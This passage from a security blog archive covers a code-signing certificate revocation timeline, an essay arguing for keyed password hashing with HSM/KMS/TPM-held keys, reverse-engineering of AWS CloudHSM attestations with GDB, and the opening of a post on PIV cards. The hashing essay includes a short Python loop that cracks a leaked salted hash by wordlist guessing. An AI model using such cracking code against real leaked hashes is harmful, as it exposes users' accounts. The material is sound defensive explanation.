  • Jun 6: The ConnectWise security team gets in contact with the River security team.
  • Jun 9: ConnectWise notifies customers about an impending revocation, stating that installers must be upgraded by June 10th.
  • Jun 10: ConnectWise extends deadline to June 13th.
  • Jun 13: Revocation timestamp backdated to issuance by DigiCert, invalidating all previously signed binaries. This can be confirmed by retrieving the DigiCert CRL and looking for the serial ID of the ConnectWise certificate:
$ curl -s "http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl" | openssl crl -inform DER -noout -text | grep -A4 "0B9360051BCCF66642998998D5BA97CE"
    Serial Number: 0B9360051BCCF66642998998D5BA97CE
        Revocation Date: Aug 17 00:00:00 2022 GMT
        CRL entry extensions:
            X509v3 CRL Reason Code: 
                Key Compromise

Acknowledgements

  1. Ryan Hurst for help with the investigation and recognizing how this scenario represented a divergence from CAB Forum rules around responsible use of code-signing certificates. While we were not the first to spot threat actors leveraging ScreenConnect binaries in the wild, it was Ryan who brought this matter to the attention of the one entity— DigiCert, the issuing certificate authority— in a position to take decisive action and mitigate the risk.
  2. The DigiCert team for promptly taking action to protect not only River clients, but all Windows users against potential abuse of ScreenConnect installers fraudulently mislabeled as other legitimate applications.

Matt Ludwigs & Cem Paya, for River Security Team


The case for keyed password hashing

An idea whose time has come?

Inefficient by design

Computer science is all about efficiency: doing more with less. Getting to the same answer faster in fewer CPU cycles, using less memory or economizing on some other scarce resource such as power consumption. That philosophy makes certain designs stand out for doing exactly the opposite: protocols crafted to deliberately waste CPU cycles, take up vast amounts of memory or delay availability of some answer. Bitcoin mining gets criticized— often unfairly— as the poster-child for an arms race designed to throw more and more computing power at a “useless” problem. Yet there is a much older, more mundane and rarely questioned waste of CPU cycles: password hashing.

In the beginning: /etc/passwd

Password hashing has ancient origins when judged by the compressed timeline of computing history. Original UNIX systems stored all user passwords in a single world-readable file under /etc/passwd. That was in the days of time-sharing systems, when computers were bulky and expensive. Individuals did not have the luxury of keeping one under their desk, much less in their pocket. Instead they were given accounts on a shared machine owned and managed by the university/corporation/branch of government. When Alice and Bob are on the same machine, the operating system is responsible for making sure they stay in their lane: Alice can’t access Bob’s files or vice versa. Among other things, that means making sure Alice can not find out Bob’s password.

Putting everyone’s password in a single world-readable file obviously falls short of that goal. Instead UNIX took a different approach: store a one-way cryptographic hash of the password rather than the password itself. Alice and Bob could still observe each other’s password hashes but the hashes alone were not useful. Logging into the system required the original, cleartext version of the password. With a cryptographic hash the only way to “invert” the function is by guessing: start with a list of likely passwords, hash each one and compare against the one stored in the passwd file. The hash function was also made deliberately slow. While in most cryptographic applications one prefers a hash function that executes quickly, inefficiency is a virtue here. It slows down attackers more than it slows down the defenders. The hash function is executed only a handful of times on the “honest” path, when a legitimate user is trying to log in. By contrast an attacker trying to guess passwords must repeat the same operation billions of times.
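
The attacker’s side of that bargain fits in a few lines. A minimal sketch of the guess-and-compare loop, using an illustrative salted hash construction and an inline wordlist; real attacks differ mainly in the cost per guess and the size of the wordlist.

import hashlib

def hash_guess(salt: bytes, guess: str) -> bytes:
    # Illustrative construction; the original crypt() was deliberately slower.
    return hashlib.sha256(salt + guess.encode()).digest()

# Stand-ins for a leaked /etc/passwd entry.
leaked_salt = b"0123456789abcdef"
leaked_hash = hash_guess(leaked_salt, "sunshine123")

# Walk candidates from most to least likely and compare.
wordlist = ["password", "123456", "qwerty", "sunshine123", "x3saUU5g0Y0t"]
for guess in wordlist:
    if hash_guess(leaked_salt, guess) == leaked_hash:
        print("recovered password:", guess)
        break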

Later UNIX versions changed this game by separating password hashes— the sensitive stuff— from other account metadata which must remain world-readable. Hashes were moved to a separate file appropriately called the “shadow” file, commonly located at /etc/shadow. With this improvement attackers must first exploit a local privilege-escalation vulnerability to read the shadow file before they can unleash their password-cracking rig on target hashes.

Atavistic designs for the 21st century

While the 1970s are a distant memory, vestiges of this design persist in the way modern websites manage customer passwords. There may not be a world-readable password file or even a shadow file at risk of being exposed to users, but in one crucial way the best practice has not budged: use a one-way hash function to process passwords for storage. There have been significant advances in how these hash functions are designed. For example the 1990s-era PBKDF2 includes an adjustable difficulty— read: inefficiency— level, allowing the hash function to waste more time as CPUs become faster. Bcrypt, of similar vintage, follows the same approach. Scrypt ups the ante along a new dimension: in addition to being inefficient in time by consuming a gratuitous amount of CPU cycles, it also seeks to be inefficient in space by deliberately gobbling up memory to prevent attackers from leveraging fast but memory-constrained systems such as GPUs and ASICs. (Interestingly these same constraints also come up in the design of proof-of-work functions for blockchains, where burning up some resource such as CPU cycles is the entire point.)
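
Both knobs are exposed directly in the Python standard library, which makes the deliberate inefficiency easy to see. A minimal sketch with illustrative cost parameters; production settings should follow current guidance for the chosen function.

import hashlib, os

password = b"correct horse battery staple"
salt = os.urandom(16)

# PBKDF2: the iteration count is the tunable inefficiency-in-time knob.
pbkdf2_hash = hashlib.pbkdf2_hmac("sha256", password, salt, iterations=600_000)

# scrypt: n sets the CPU/memory cost, r the block size, p the parallelism.
# These parameters force roughly 16 MB of memory per guess in addition to time.
scrypt_hash = hashlib.scrypt(password, salt=salt, n=2**14, r=8, p=1)

print(pbkdf2_hash.hex(), scrypt_hash.hex(), sep="\n")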

Aside from committing the cardinal sin of computer science— inefficiency— there is a more troubling issue with this approach: it places the burden of security on users. The security of the password depends not only on the choice of hash function and its parameters, but also on the quality of the password selected. Quality is elusive to define formally, despite no shortage of “password strength meters” on websites egging users on to max out their scale. Informally it is a measure of how unlikely that password is to be included among the guesses tried by a hypothetical attacker. That of course depends on exactly the order in which an attacker goes about guessing. Given that the number of all possible passwords is astronomically large, no classical computer has a chance of going through every guess even when a simple hash function is used. (Quantum computers provide a speed-up in principle with Grover’s algorithm.) Practical attacks instead leverage the weak point: human factors. Users have difficulty remembering long, random strings. Absent some additional help, such as a password manager to generate random choices, they are far more likely to pick simple ones with patterns: dictionary words, keyboard sequences (“asdfgh”), names of relatives, calendar dates. Attacks exploit this fact by ordering the sequence of guesses from simple to increasingly complex. The password “sunshine123” will be tried relatively early. Meanwhile “x3saUU5g0Y0t” may be out of reach: there is not enough compute power available to the attacker to get that far down the list of candidates in the allotted time. The upshot of this constraint: users with weak passwords are at higher risk if an attacker gets hold of password hashes.

Not surprisingly, websites are busy making up arbitrary password complexity rules, badgering users with random restrictions: include mixed case, sprinkle in numerical digits, finish off with a touch of special characters but not that one. This may look like an attempt to improve security for customers. Viewed from another perspective, it is an abdication of responsibility: instead of providing the same level of security for everyone, the burden of protecting password hashes from brute-force attacks is shifted to customers.

To be clear, there is a minimal level of password quality helpful to resist online attacks. This is when the attacker tries to log in through standard avenues, typically by entering the password into a form. Online attacks are very easy to detect and protect against: most services will lock out accounts after a handful of incorrect guesses or require a CAPTCHA to throttle attempts. Because attackers can only get in a handful of tries this way, only the most predictable choices are at risk. (By contrast an attacker armed with a stolen database of password hashes is only limited by the processing power available. Not to mention this attack is silent: because there is no interaction with the website— unlike the online guessing approach— the defenders have no idea that an attack is underway or which accounts need to be locked for protection.) Yet the typical password complexity rules adopted by websites go far beyond what is required to prevent online guessing. Instead they are aimed at the worst-case scenario of an offline attack against leaked password hashes.

Side-stepping the arms race: keyed hashing

One way to relieve end-users of the responsibility of securing their own password storage— for as long as passwords remain in use, considering FIDO2 is going nowhere fast— is to mix a secret into the hashing process. That breaks an implicit but fundamental assumption in the threat model: so far we have assumed attackers have access to the same hash function the defenders use, and can run it on their own hardware millions of times. That was certainly the case for the original UNIX password hashing function “crypt.” (Side-note: ironically crypt was based on the block cipher DES, which uses a secret key to encrypt data. “Crypt” itself does not incorporate a key.) But if the hash function requires access to some secret known only to the defender, then the attacker is out of luck.

For this approach to be effective, the “unknown” must involve a cryptographic secret and not the construction of the function. For example making some tweaks to bcrypt and hoping the attacker remains unaware of that change provides no meaningful benefit. That would be a case of the thoroughly discredited security-through-obscurity approach. As soon as the attacker gets wind of the changes— perhaps by getting access to source code in the same breach that resulted in the leak of password hashes— it would be game over.

Instead the unknown must be a proper cryptographic key that is used by the hash function itself. Luckily this is exactly what a keyed hash provides. In the same way that a plain hash function transforms input of arbitrary size into a fixed-size output in an irreversible manner, a keyed hash does the same while incorporating a secret key.

KH(message, key) → short hash

HMAC is one of the better options but there are others, including CMAC and newer alternatives such as Poly1305 and KMAC. All of these functions share the same underlying guarantee: without knowing the key, it is computationally difficult to produce the correct result for a new message. That holds true even when the attacker can “sample” the function on other messages. For example an attacker may have multiple accounts on the same website and observe the keyed hashes for their own accounts, for which they selected the passwords. Assuming our choice of keyed hash lives up to its advertised properties, that still provides no advantage in computing keyed hashes of other candidate passwords.
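
A minimal sketch of what this looks like with HMAC from the Python standard library. The key handling is deliberately simplified; the next section covers where that key should actually live.

import hmac, hashlib, os

SERVER_KEY = os.urandom(32)   # in practice held in an HSM, KMS or TPM, never alongside the hashes

def keyed_hash(salt: bytes, password: str) -> bytes:
    # Without SERVER_KEY, a stolen (salt, hash) pair cannot be tested offline.
    return hmac.new(SERVER_KEY, salt + password.encode(), hashlib.sha256).digest()

salt = os.urandom(16)
stored = keyed_hash(salt, "hunter2")

# Verification at login: recompute and compare in constant time.
print(hmac.compare_digest(stored, keyed_hash(salt, "hunter2")))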

Modern options for key management

The main challenge for deploying keyed hashing at scale comes down to managing the lifecycle of the key. There are three areas to address:

  1. Confidentiality is paramount. This key must be guarded well. If attackers get hold of it, the scheme stops being a keyed hash and turns into a plain hash. (One way to mitigate that is to apply the keyed hash in series after an old-school, slow unkeyed hash. More on this in a follow-up post.) That means the key can not be stored in, say, the same database where the password hashes are kept: otherwise any attack that could get at the hashes would also divulge the key, negating any benefits.
  2. Availability is equally critical. Just as important as preventing attackers from getting their hands on the key is making sure defenders do not lose their copy. Otherwise users will not be able to log in: there is no way to validate whether they supplied the right password without using this key to recompute the hash. That means it can not be some ephemeral secret generated on one server and never backed up elsewhere. Failure at that single point would result in loss of the only existing copy and render all stored hashes useless for future validation.
  3. Key rotation is tricky. It is not possible to simply “rehash” all passwords with a new key whenever the service decides it is time for a change. There is no way to recover the original password from the hash, even with possession of the current key. Instead there will be an incremental, rolling migration (sketched below): as each customer logs in and submits their cleartext password, it is validated against the current version of the key and then rehashed with the next version to replace the database entry.
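
A minimal sketch of that rolling migration, with key versions tracked per record. The in-memory key table and record layout are hypothetical stand-ins for whatever key store and database the deployment actually uses.

import hmac, hashlib

KEYS = {1: b"old key material................", 2: b"new key material................"}
CURRENT_VERSION = 2

def keyed_hash(version: int, salt: bytes, password: str) -> bytes:
    return hmac.new(KEYS[version], salt + password.encode(), hashlib.sha256).digest()

def verify_and_migrate(record: dict, password: str) -> bool:
    candidate = keyed_hash(record["key_version"], record["salt"], password)
    if not hmac.compare_digest(candidate, record["hash"]):
        return False
    if record["key_version"] != CURRENT_VERSION:
        # Re-hashing is only possible here, while the cleartext password is in hand.
        record["hash"] = keyed_hash(CURRENT_VERSION, record["salt"], password)
        record["key_version"] = CURRENT_VERSION
    return True

record = {"key_version": 1, "salt": b"0123456789abcdef",
          "hash": keyed_hash(1, b"0123456789abcdef", "hunter2")}
print(verify_and_migrate(record, "hunter2"), record["key_version"])  # True 2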

Of these, #3 is an inevitable implementation twist, not that different in spirit from migrating from one unkeyed hash to another. But there is plenty of help available in modern cloud environments to solve the first two problems.

Until about 10 years ago, using dedicated cryptographic hardware— specifically an HSM, or hardware security module— was the standard answer to any key management problem with this stringent combination of confidentiality and availability. HSMs allow “grounding” secrets to physical objects in such a way that the secret can be used but not disclosed. This creates a convenient oracle abstraction: a blackbox that can be asked to perform keyed-hash computations on any input message of our choosing, but can not be coerced to divulge the secret involved in those computations. Unfortunately those security guarantees come with high operational overhead: purchasing hardware, setting it up in one or more physical data centers and working with arcane, vendor-specific procedures to synchronize key material across multiple units while retaining backups in case the datacenter itself goes up in flames. While that choice is still available today and arguably provides the highest level of security/control, there are more flexible options with different tradeoffs along the curve:

  • CloudHSM offerings from AWS and Google have made it easier to lease HSMs without dealing with physical hardware. These are close to the bare-metal interface of the underlying hardware but often throw in useful functionality such as replication and backup automatically.
  • One level of abstraction up, major cloud platforms have all introduced “Key Management Service” or KMS offerings (a short usage sketch follows this list). These are often backed by an HSM but hide the operational complexity and offer simpler APIs for cryptographic operations compared to the native PKCS#11 interface exposed by the hardware. They also take care of backup and availability, often providing extra guard-rails that can not be removed. For example AWS imposes a mandatory delay for deleting keys. Even an attacker that temporarily gains AWS root permissions can not inflict permanent damage by destroying critical keys.
  • Finally TPMs and virtualized TPMs have become common enough that they can be used often at a fraction of the cost of HSMs. A TPM can provide the same blackbox interface for computing HMACs with a secret key held in hardware. TPMs do not have the same level of tamper resistance against attackers with physical access, but that is often not the primary threat one is concerned with. A more serious limitation is that TPMs lack replication or backup capabilities. That means keys must be generated outside the production environment and imported into each TPM, creating weak points where keys are handled in cleartext. (Although this only has to be done once for the lifecycle of the hardware. TPM state is decoupled from the server. For example all disks can be wiped and the OS reinstalled with no effect on imported keys.)
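As an example of the KMS route, AWS KMS can hold an HMAC key and compute the keyed hash on demand, so the key never leaves the service. A minimal boto3 sketch (the key alias is a placeholder, and the key must have been created with an HMAC key spec):

import boto3

kms = boto3.client("kms")

# Placeholder alias for a KMS key created with an HMAC key spec such as HMAC_256.
KEY_ID = "alias/password-keyed-hash"

def keyed_hash(password: str) -> bytes:
    """Ask KMS to compute HMAC-SHA-256 over the password; only the MAC comes back."""
    response = kms.generate_mac(
        KeyId=KEY_ID,
        Message=password.encode("utf-8"),
        MacAlgorithm="HMAC_SHA_256",
    )
    return response["Mac"]

There is a matching VerifyMac operation, so verification can also be delegated to KMS instead of comparing MAC values in application code.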

Threat-model and improving chances of detection

In all cases the threat model shifts. Pure “offline” attacks are no longer feasible even if an attacker can get hold of password hashes. (Short of a physical attack where the adversary walks into the datacenter and rips an HSM out of the rack or yanks the TPM out of the server board— hardly stealthy.) However that is not the only scenario where an attacker can access the same hash function used by the defenders to create those hashes. After getting sufficient privileges in the production environment, a threat actor can also make calls to the same HSM, KMS or TPM used by the legitimate system. That means they can still mount a guessing attack by running millions of hashes and comparing against known targets. So what did the defenders gain?

First note this attack is very much online. The attacker must interact with the gadget or remote service performing the keyed hash for each guess. It can not be run in a sealed environment controlled by the attacker. This has two useful consequences:

  • Guessing speed is capped. It does not matter how many GPUs the attacker has at their disposal. The bottleneck is the number of HMAC computations the selected blackbox can perform; a back-of-envelope calculation follows this list. (Seen in this light, TPMs have an additional virtue: they are much less powerful than both HSMs and typical cloud KMSes. But this is a consequence of their limited hardware rather than any deliberate attempt to waste cycles.)
  • Attackers risk detection. In order to invoke the keyed hash they must either establish persistence in the production environment where the cryptographic hardware resides or invoke the same remote APIs on a cloud KMS service. In the first case this continued presence increases the signals available to defenders for detecting an intrusion. In some cases the cryptographic hardware itself could provide clues. For example many HSMs have an audit trail of operations; a sudden spike in the number of requests could signal unauthorized access. Similarly in the second case usage metrics from the cloud provider provide a robust signal of unexpected use. In fact since KMS offerings typically charge per operation, the monthly bill alone becomes evidence of an ongoing brute-force attack.
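To put rough numbers on the rate cap (figures are illustrative, not measurements of any particular device):

# Illustrative assumption: the HSM/KMS/TPM sustains 10,000 HMAC calls per second
# and the attacker wants to run one billion guesses against a stolen hash.
ops_per_second = 10_000
guesses = 1_000_000_000
print(guesses / ops_per_second / 86_400)   # ~1.2 days per billion guesses, per target

A commodity GPU rig running an unkeyed fast hash would burn through the same billion guesses in seconds, entirely offline and invisible to the defender.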

CP

AWS CloudHSM key attestations: trust but verify

(Or, scraping attestations from half-baked AWS utilities)

Verifying key provenance

Special-purpose cryptographic hardware such as an HSM is one of the best options for managing high-value cryptographic secrets, such as private keys controlling blockchain assets. When significant effort has gone into deploying such a heavyweight solution, it is often useful to be able to demonstrate that fact to third-parties. For example the company may want to convince customers, auditors or even regulators that critical key material exists only on fancy cryptographic hardware, and not on a USB drive in the CEO’s pocket or some engineer’s commodity laptop running Windows XP. This is where key attestations come in handy. An attestation is effectively a signed assertion from the hardware that a specific cryptographic key exists on that device.

At first that may not sound particularly reassuring. While that copy of the key is protected by expensive, fancy hardware, what about other copies and backups lying around on that poorly guarded USB drive? These concerns are commonly addressed by design constraints in HSMs which guarantee keys are generated on-board the hardware and can never be extracted out in the clear. This first part guarantees no copies of the key existed outside the trusted hardware boundary before it was generated, while the second part guarantees no other copies can exist after generation. This notion of being “non-extractable” means it is not possible to observe raw bits of the key, save them to a file, write them on a Post-It note, turn it into a QR code, upload it to Pastebin or any of the dozens of other creative ways ops personnel have compromised key security over the years. (To the extent backups are possible, it involves cloning the key to another unit from the same manufacturer with the same guarantees. Conveniently that creates lock-in to one particular model in the name of security— or what vendors prefer to call “customer loyalty.” 🤷🏽)

CloudHSM, take #2

Different platforms handle attestation in different ways. For example in the context of Trusted Platform Modules, the operations are standardized by the TPM2 specification. This blog post looks at AWS CloudHSM, which is based on the Marvell Nitrox HSMs, previously named Cavium. Specifically, this is the second version of Amazon’s hosted HSM offering. The first iteration (now deprecated) was built on Thales née Gemalto née Safenet hardware. (While the technology inside an HSM advances slowly due to FIPS certification requirements, the nameplate on the outside can change frequently with mergers & acquisitions of manufacturers.)

Attestations only make sense for asymmetric keys, since it is difficult to convey useful information about a symmetric key without actually leaking the key itself. For asymmetric cryptography, there is a natural way to uniquely identify private keys: the corresponding public-key. It is sufficient for the hardware then to output a signed statement to the effect “the private key corresponding to public key K is resident on this device with serial number #123.” When the authenticity of that statement can be verified, the purpose of attestation is served. Ideally that verification involves a chain of trust going all the way back to the hardware manufacturer who is always part of the TCB. Attestations are signed with a key unique to each particular unit. But how can one be confident that unit is supposed to come with that key? Only the manufacturer can vouch for that, typically by signing another statement to the effect “device with serial #123 has attestation-signing key A.” Accordingly every attestation can be verified given a root key associated with the hardware manufacturer.

If this sounds a lot like the hierarchical X509 certificate model, that is no coincidence. The manufacturer vouches for a specific unit of hardware it built, and that unit in turn vouches for the pedigree of a specific user-owned key. X509 certificates seem like a natural fit. But not all attestation models historically follow the standard. For example the TPM2 specification defines its own (non-ASN1) binary format for attestations. It also diverges from the X509 model, relying on a complex interactive protocol to improve privacy, with a separate, static endorsement key (itself validated by a manufacturer-issued X509 certificate, confusingly enough) and any number of attestation keys that sign the actual attestations. Luckily Marvell has hewed closely to the X509 model, with the exception of the attestations themselves, where another home-brew (again, non-ASN1) binary format is introduced.

Trust & don’t bother to verify?

There is scarcely any public documentation from AWS on this proprietary format. In fact given the vast quantity of guidance on CloudHSM usage, there is surprisingly no mention of proving key provenance. There is one section on verifying the HSM itself— neither necessary nor sufficient for our objective. That step only covers verifying the X509 certificate associated with the HSM, proving at best that there is some Marvell unit lurking somewhere in the AWS cloud. But that is a long way from proving that the particular blackbox we are interacting with, identified by a private IP address within the VPC, is one of those devices. (An obvious question is whether TLS could have solved that problem. The transport protocol does use certificates to authenticate both sides of the connection but, in an unexpected twist, CloudHSM requires the customer to issue that certificate to the HSM. If there were a preexisting certificate already provisioned in the HSM that chains up to a Marvell CA, it would indeed have proven the device at the other end of the connection is a real HSM.)

Neither the CloudHSM documentation nor the latest version of the CloudHSM client SDK (V5) has much to say on obtaining attestations for a specific key generated on the HSM. There are references to attestations in certain subcommands of key_mgmt_util, specifically for key generation. For example the documentation for genRSAKeyPair states:


-attest

Runs an integrity check that verifies that the firmware on which the cluster runs has not been tampered with.

This is at best an unorthodox definition of key attestation. While it is missing from the V5 SDK documentation, the “previous” V3 SDK (makes you wonder what happened to V4?) also mentions the same optional flag being available when querying key attributes with the “getAttribute” subcommand. That code path will prove useful for understanding attestations: each key is only generated once, but one can query attributes any number of times to retrieve attestations.

Focusing on the V3 SDK, which is no longer available for download, one immediately runs into problems with ancient dependencies: it is linked against OpenSSL 1.x, which prevents out-of-the-box installation on modern Linux distributions.

But even after jumping through the necessary hoops to make it work, the result is underwhelming: while the utility claims to retrieve and verify Marvell attestations, it does not expose the attestation to the user. In effect these utilities are asserting: “Take our word for it, this key lives on the HSM.” That defeats the whole point of generating attestations, namely being able to convince third-parties that keys are being managed according to certain standards. (It also raises the question of whether Amazon itself understands the threat model of a service for which it is charging customers a pretty penny.)

Step #1: Recovering the attestation

When existing AWS utilities will not do the job, the logical next step is writing code from scratch to replicate their functionality while saving the attestation, instead of throwing it away after verification. But that requires knowledge of the undocumented APIs offered by Marvell. While CloudHSM is compliant with the standard PKCS#11 API for accessing cryptographic hardware, PKCS#11 itself does not have a concept of attestations. Whatever this Amazon utility is doing to retrieve attestations involves proprietary APIs or at least proprietary extensions to APIs such as a new object attribute which neither Marvell nor Amazon have documented publicly. (Marvell has a support portal behind authentication, which may have an SDK or header files accessible to registered customers.) 

Luckily recovering the raw attestation from the AWS utility is straightforward. An unexpected assist comes from the presence of debugging symbols, making it much easier to reverse engineer this otherwise blackbox binary. Looking at function names with the word “attest”, one stands out prominently:

[ec2-user@ip-10-9-1-139 1]$ objdump -t /opt/cloudhsm/bin/key_mgmt_util  | grep -i attest
000000000042e98b l     F .text 000000000000023b              appendAttestation
000000000040516d g     F .text 0000000000000196              verifyAttestation

We can set a break point on verifyAttestation with GDB:

(gdb) info functions verifyAttestation
All functions matching regular expression "verifyAttestation":
File Cfm3Util.c:
Uint8 verifyAttestation(Uint32, Uint8 *, Uint32);
(gdb) break verifyAttestation
Breakpoint 1 at 0x40518b: file Cfm3Util.c, line 351.
(gdb) cont
Continuing.

Next generate an RSA key pair and request an attestation with key_mgmt_util:

Command:  genRSAKeyPair -sess -m 2048 -e 65537 -l verifiable -attest
Cfm3GenerateKeyPair returned: 0x00 : HSM Return: SUCCESS
Cfm3GenerateKeyPair:    public key handle: 1835018    private key handle: 1835019

The breakpoint is hit at this point, after key generation has already completed and key handles for public/private halves returned. (This makes sense; an attestation is only available after key generation has completed successfully.)

Breakpoint 1, verifyAttestation (session_handle=16809986, response=0x1da86e0 "", response_len=952) at Cfm3Util.c:351
351 Cfm3Util.c: No such file or directory.
(gdb) bt
#0  verifyAttestation (session_handle=16809986, response=0x1da86e0 "", response_len=952) at Cfm3Util.c:351
#1  0x0000000000410604 in genRSAKeyPair (argc=10, argv=0x697a80 <vector>) at Cfm3Util.c:4555
#2  0x00000000004218f5 in CfmUtil_main (argc=10, argv=0x697a80 <vector>) at Cfm3Util.c:11360
#3  0x0000000000406c86 in main (argc=1, argv=0x7ffdc2bb67f8) at Cfm3Util.c:1039

Owing to the presence of debugging symbols, we also know which function argument contains the pointer to the attestation in memory (“response”) and its size (“response_len”). GDB can save that memory region to a file for future review:

(gdb) dump memory /tmp/sample_attestation response response+response_len

Side note before moving on to the second problem, namely making sense of the attestation: While this example showed interactive use of GDB, in practice the whole setup would be automated. GDB allows defining automatic commands to execute after a breakpoint, and also allows launching a binary with a debugging “script.” Combining these capabilities:

  • Create a debugger script to set a breakpoint on verifyAttestation. The breakpoint will have an associated command to write the memory region to file and continue execution. In that sense the breakpoint is not quite “breaking” program flow but taking a slight detour to capture memory along the way.
  • Invoke GDB to load this script before executing the AWS utility, as sketched below.
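A minimal command file along these lines might look like the following (paths and symbol names match the earlier transcript; an untested sketch):

# capture_attestation.gdb -- dump the attestation buffer every time verifyAttestation runs
set pagination off
break verifyAttestation
commands
  silent
  dump memory /tmp/sample_attestation response response+response_len
  continue
end
run

Launching the utility under this script with “gdb -q -x capture_attestation.gdb /opt/cloudhsm/bin/key_mgmt_util” leaves the interactive prompt fully usable while quietly writing out the most recent attestation.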

Step #2: Verifying the signature

Given an attestation in raw binary format, the next step is parsing and verifying the contents, mirroring what the AWS utility does in the “verifyAttestation” function. Here we specifically focus on attestations returned when querying key attributes because that presents a more general scenario: key generation takes place only once, while attributes of an existing key can be queried anytime.

By “attributes” we are referring to PKCS#11 attributes associated with a cryptographic object present on the HSM. Some examples:

  • CKA_CLASS: Type of object (symmetric key, asymmetric key…)
  • CKA_KEY_TYPE: Algorithm associated with a key (e.g. AES, RSA, EC…)
  • CKA_PRIVATE: Does using the key require authentication?
  • CKA_EXTRACTABLE: Can the raw key material be exported out of the HSM? (PKCS#11 has an interesting rule that this attribute can only be changed from true→false; it can not go in the other direction.)
  • CKA_NEVER_EXTRACTABLE: Was the CKA_EXTRACTABLE attribute ever set to true? (This is important when establishing whether an object is truly HSM-bound. Otherwise one can generate an initially extractable key, make a copy outside the HSM and later flip the attribute.)

Experiments show the exact same breakpoint for verifying attestations is triggered through this alternative code path when “-attest” flag is present:

Command:  getAttribute -o 524304 -a 512 -out /tmp/attributes -attest
Attestation Check : [PASS]
Verifying attestation for value
Attestation Check : [PASS]
Attribute size: 941, count: 27
Written to: /tmp/attributes file
Cfm3GetAttribute returned: 0x00 : HSM Return: SUCCESS

The utility writes a plain-text file containing all attributes of the RSA key. Once again the attestation itself is verified and promptly discarded under normal execution. But the debugger tricks described earlier help capture a copy of the original binary blob returned. There is no public documentation from AWS or Marvell on the internal structure of these attestations. Until recently there was a public article on the Marvell website (it no longer resolves) which linked to two Python scripts that are still accessible as of this writing.

These scripts are unable to parse attestations from step #1, possibly because they are associated with a different product line or perhaps different version of the HSM firmware. But they offer important clues about the format, including the signature format: it turns out to be the last 256 bytes of the attestation, carrying a 2048-bit RSA signature. In fact one of the scripts can successfully verify the signature on a CloudHSM attestation, when given the partition certificate from the HSM:

[ec2-user@ip-10-9-1-139 clownhsm]$ python3 verify_attest.py partition_cert.pem sample_attestation.bin 
*************************************************************************
Usage: ./verify_attest.py <partition.cert> <attestation.dat>
*************************************************************************
verify_attest.py:29: DeprecationWarning: verify() is deprecated. Use the equivalent APIs in cryptography.
  crypto.verify(cert_obj, signature, blob, 'sha256')
Verify3 failed, trying with V2
RSA signature with raw padding verified
Signature verification passed!
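Stripped of scaffolding, the check amounts to roughly the following sketch. (The layout, SHA-256 over everything except the trailing 256-byte signature recovered with a textbook raw RSA operation, is inferred from the script output above and may not match the firmware's exact padding rules.)

import hashlib
from cryptography import x509

cert = x509.load_pem_x509_certificate(open("partition_cert.pem", "rb").read())
blob = open("sample_attestation.bin", "rb").read()

body, signature = blob[:-256], blob[-256:]
digest = hashlib.sha256(body).digest()

# "Raw padding": recover the signed block with plain modular exponentiation
# and check that it ends with the SHA-256 digest of the attestation body.
numbers = cert.public_key().public_numbers()
recovered = pow(int.from_bytes(signature, "big"), numbers.e, numbers.n)
print("digest matches:", recovered.to_bytes(256, "big").endswith(digest))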

Step #3: Parsing fields in the attestation

Looking at the remaining two scripts we can glean how PKCS#11 attributes are encoded in general. Marvell has adopted the familiar tag-length-value model from ASN1, and yet the encoding is, inexplicably, not ASN1. Instead each attribute is represented as the concatenation of:

  • Tag containing the PKCS#11 attribute identifier, as 32-bit integer in big-endian format 
  • Length of the attribute value in bytes, also a 32-bit big-endian integer
  • Variable length byte array containing the value of the attribute 

One exception to this pattern is the first 32 bytes of an attestation. That appears to be a fixed-size header containing metadata, which does not conform to the TLV pattern. Disregarding that section, here is a sample Python script for parsing attributes and outputting them using friendly PKCS#11 names and appropriate formatting where possible. (For example CKA_LABEL as a string, CKA_SENSITIVE as a boolean and CKA_MODULUS_BITS as a plain integer.)
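A minimal version of such a parser might look like this (the attribute-name table covers only a handful of identifiers, and the assumption that the captured blob ends with the 256-byte signature from step #2 is inferred rather than documented):

import struct

# Standard PKCS#11 attribute identifiers -> friendly names (small subset)
ATTRIBUTE_NAMES = {
    0x0000: "CKA_CLASS",
    0x0002: "CKA_PRIVATE",
    0x0003: "CKA_LABEL",
    0x0100: "CKA_KEY_TYPE",
    0x0103: "CKA_SENSITIVE",
    0x0121: "CKA_MODULUS_BITS",
    0x0162: "CKA_EXTRACTABLE",
    0x0164: "CKA_NEVER_EXTRACTABLE",
}

def parse_attributes(blob: bytes) -> dict:
    """Walk the TLV records between the 32-byte header and the trailing signature."""
    data = blob[32:-256]
    offset, attributes = 0, {}
    while offset + 8 <= len(data):
        tag, length = struct.unpack_from(">II", data, offset)
        attributes[ATTRIBUTE_NAMES.get(tag, hex(tag))] = data[offset + 8 : offset + 8 + length]
        offset += 8 + length
    return attributes

def pretty(name: str, value: bytes):
    if name == "CKA_LABEL":
        return value.rstrip(b"\x00").decode("ascii", "replace")
    if name in ("CKA_PRIVATE", "CKA_SENSITIVE", "CKA_EXTRACTABLE", "CKA_NEVER_EXTRACTABLE"):
        return any(value)                    # boolean attributes
    return int.from_bytes(value, "big")      # integers such as CKA_MODULUS_BITS

blob = open("/tmp/sample_attestation", "rb").read()
for name, value in parse_attributes(blob).items():
    print(name, pretty(name, value))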

CP

Spot the Fed: CAC/PIV card edition

Privacy leaks in TLS client authentication

Spot the Fed is a long-running tradition at DefCon. Attendees try to identify suspected members of law enforcement or intelligence agencies blending in with the crowd. In the unofficial breaks between scheduled content, suspects “denounced” by fellow attendees as potential Feds are invited on stage— assuming they are good sports about it, which a surprising number prove to be— and interrogated by conference staff to determine if the accusations have merit. Spot-the-Fed is entertaining precisely because it is based on crude stereotypes, on a shaky theory that the responsible adults holding button-down government jobs will stand out in a sea of young, irreverent hacking enthusiasts. While DefCon badges feature a cutting-edge mix of engineering and art, one thing they never have is identifying information about the attendee. No names, affiliation or location. (That is in stark contrast to DefCon’s more button-down, corporate cousin, the Blackhat Briefings, which take place shortly before DefCon. BlackHat introductions often start with attendees staring at each others’ badge.)

One can imagine playing a version of Spot the Fed online: determine which visitors to a website are Feds. While there are no visuals to work with, there are plenty of other signals ranging from the visitor’s IP address to the specific configuration of their browser and OS environment. (EFF has a sobering demonstration of just how uniquely identifying some of these characteristics can be.) This blog post looks at a different type of signal that can be gleaned from a subset of US government employees: their possession of a PIV card.

Origin stories: HSPD 12

The story begins in 2004 during the Bush era with an obscure government edict called HSPD12: Homeland Security Presidential Directive #12:

